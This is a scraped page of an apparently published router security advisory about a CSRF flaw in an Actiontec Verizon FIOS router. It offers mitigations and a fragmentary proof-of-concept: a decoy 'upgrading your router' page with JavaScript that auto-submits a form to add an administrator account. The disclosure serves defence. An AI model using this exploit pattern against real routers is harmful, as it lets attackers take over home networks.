ISE SOHO Vulnerability Catalog Published - Independent Security ...
ISE SOHO Vulnerability Catalog Published - Independent Security ...
ISE SOHO Vulnerability Catalog Published - Independent Security ...
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
Solution<br />
♦ There currently is not a solution to this problem.<br />
♦ DO NOT STAY LOGGED INTO THE ROUTER'S MANAGEMENT<br />
INTERFACE.<br />
♦ Restrict access to WAN services such as remote management to prevent an<br />
attacker from gaining access if an attack is successful.<br />
Proof of Concept Exploit<br />
HTML FILE #1<br />
<br />
Actiontec Verizon FIOS CSRF -‐ Adding Administrator User <br />
<br />
<br />
Please sit tight while we upgrade your router <br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
function CSRF1() {window.open("http://10.0.1.101/verizonFIOS2.html");};window.setTimeout(CSRF1,1000) <br />
function CSRF2() {document.verizonActiontec.submit();};window.setTimeout(CSRF2,1000) <br />
<br />
<br />
<br />
HTML FILE #2<br />
<br />
Actiontec Verizon FIOS CSRF2 -‐ Add User w/ No Pass Confirmation <br />
<br />
<br />
<br />
<br />
<br />
7